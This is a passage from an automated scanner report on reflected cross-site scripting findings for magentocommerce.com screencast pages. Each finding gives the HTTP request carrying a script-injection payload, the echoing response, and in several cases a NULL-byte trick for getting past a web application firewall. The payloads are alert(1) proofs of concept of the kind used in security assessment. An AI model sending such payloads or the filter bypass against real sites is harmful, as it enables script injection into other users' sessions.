Set-Cookie: exp_last_activity=1313176164; expires=Sat, 11-Aug-2012 15:09:24 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fmedia%2Fscreencasts%2Fadding-related-products%2Fview%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:24 GMT
Content-Length: 33316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/adding-related-products/view?%002f335"><script>alert(1)</script>878d14e3ada=1">
...[SNIP]...
1.5. http://www.magentocommerce.com/media/screencasts/community-groups/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/community-groups/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b28a6"><script>alert(1)</script>1f29963ffb4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/community-groupsb28a6"><script>alert(1)</script>1f29963ffb4/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176258; expires=Sat, 11-Aug-2012 15:10:58 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:59 GMT
Content-Length: 33499

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/community-groupsb28a6"><script>alert(1)</script>1f29963ffb4/view">
...[SNIP]...
1.6. http://www.magentocommerce.com/media/screencasts/community-groups/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/community-groups/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c9b19"><script>alert(1)</script>7b124583d27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c9b19"><script>alert(1)</script>7b124583d27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/community-groups/view?%00c9b19"><script>alert(1)</script>7b124583d27=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176142; expires=Sat, 11-Aug-2012 15:09:02 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fmedia%2Fscreencasts%2Fcommunity-groups%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:03 GMT
Content-Length: 33324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/community-groups/view?%00c9b19"><script>alert(1)</script>7b124583d27=1">
...[SNIP]...
1.7. http://www.magentocommerce.com/media/screencasts/configurable-products/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configurable-products/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b771"><script>alert(1)</script>18575fd053 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/configurable-products7b771"><script>alert(1)</script>18575fd053/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176335; expires=Sat, 11-Aug-2012 15:12:15 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:15 GMT
Content-Length: 33503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/configurable-products7b771"><script>alert(1)</script>18575fd053/view">
...[SNIP]...
1.8. http://www.magentocommerce.com/media/screencasts/configurable-products/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configurable-products/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006cebb"><script>alert(1)</script>57e160a161a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6cebb"><script>alert(1)</script>57e160a161a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/configurable-products/view?%006cebb"><script>alert(1)</script>57e160a161a=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176205; expires=Sat, 11-Aug-2012 15:10:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fmedia%2Fscreencasts%2Fconfigurable-products%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:05 GMT
Content-Length: 35307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/configurable-products/view?%006cebb"><script>alert(1)</script>57e160a161a=1">
...[SNIP]...
1.9. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configuring-tier-pricing/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93130"><script>alert(1)</script>0ed12d6b331 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/configuring-tier-pricing93130"><script>alert(1)</script>0ed12d6b331/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176299; expires=Sat, 11-Aug-2012 15:11:39 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:40 GMT
Content-Length: 33507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing93130"><script>alert(1)</script>0ed12d6b331/view">
...[SNIP]...
1.10. http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/configuring-tier-pricing/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a8382"><script>alert(1)</script>ed448912710 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a8382"><script>alert(1)</script>ed448912710 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/configuring-tier-pricing/view?%00a8382"><script>alert(1)</script>ed448912710=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176244; expires=Sat, 11-Aug-2012 15:10:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fmedia%2Fscreencasts%2Fconfiguring-tier-pricing%2Fview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:45 GMT
Content-Length: 34980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/configuring-tier-pricing/view?%00a8382"><script>alert(1)</script>ed448912710=1">
...[SNIP]...
1.11. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/content-staging-and-merging/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a63b5"><script>alert(1)</script>03d6ebc65f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/content-staging-and-merginga63b5"><script>alert(1)</script>03d6ebc65f7/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176212; expires=Sat, 11-Aug-2012 15:10:12 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:12 GMT
Content-Length: 33510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/content-staging-and-merginga63b5"><script>alert(1)</script>03d6ebc65f7/view">
...[SNIP]...
1.12. http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/content-staging-and-merging/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e6627"><script>alert(1)</script>315df2cd626 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e6627"><script>alert(1)</script>315df2cd626 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/content-staging-and-merging/view?%00e6627"><script>alert(1)</script>315df2cd626=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176146; expires=Sat, 11-Aug-2012 15:09:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A52%3A%22%2Fmedia%2Fscreencasts%2Fcontent-staging-and-merging%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:06 GMT
Content-Length: 33338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/content-staging-and-merging/view?%00e6627"><script>alert(1)</script>315df2cd626=1">
...[SNIP]...
1.13. http://www.magentocommerce.com/media/screencasts/currency/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/currency/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4254"><script>alert(1)</script>d10612e3d58 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/currencye4254"><script>alert(1)</script>d10612e3d58/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176217; expires=Sat, 11-Aug-2012 15:10:17 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:17 GMT
Content-Length: 33491

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/currencye4254"><script>alert(1)</script>d10612e3d58/view">
...[SNIP]...
1.14. http://www.magentocommerce.com/media/screencasts/currency/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/currency/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002e247"><script>alert(1)</script>4e616fa203b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2e247"><script>alert(1)</script>4e616fa203b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/currency/view?%002e247"><script>alert(1)</script>4e616fa203b=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176142; expires=Sat, 11-Aug-2012 15:09:02 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fmedia%2Fscreencasts%2Fcurrency%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:02 GMT
Content-Length: 34921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/currency/view?%002e247"><script>alert(1)</script>4e616fa203b=1">
...[SNIP]...
1.15. http://www.magentocommerce.com/media/screencasts/data-exporting/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/data-exporting/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7228e"><script>alert(1)</script>5efecb7ffae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/data-exporting7228e"><script>alert(1)</script>5efecb7ffae/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176231; expires=Sat, 11-Aug-2012 15:10:31 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:32 GMT
Content-Length: 33497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/data-exporting7228e"><script>alert(1)</script>5efecb7ffae/view">
...[SNIP]...
1.16. http://www.magentocommerce.com/media/screencasts/data-exporting/view [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/data-exporting/view

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b23ed"><script>alert(1)</script>58665ad958a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b23ed"><script>alert(1)</script>58665ad958a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /media/screencasts/data-exporting/view?%00b23ed"><script>alert(1)</script>58665ad958a=1 HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176144; expires=Sat, 11-Aug-2012 15:09:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fmedia%2Fscreencasts%2Fdata-exporting%2Fview%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:05 GMT
Content-Length: 34694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<a href="http://www.magentocommerce.com/boards/member/login/?RET=http://www.magentocommerce.com/media/screencasts/data-exporting/view?%00b23ed"><script>alert(1)</script>58665ad958a=1">
...[SNIP]...
1.17. http://www.magentocommerce.com/media/screencasts/designers-guide-1/view [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/designers-guide-1/view

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4ebd"><script>alert(1)</script>0b0eb7b22d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media/screencasts/designers-guide-1f4ebd"><script>alert(1)</script>0b0eb7b22d1/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176226; expires=Sat, 11-Aug-2012 15:10:26 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:27 GMT
Content-Length: 33500

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
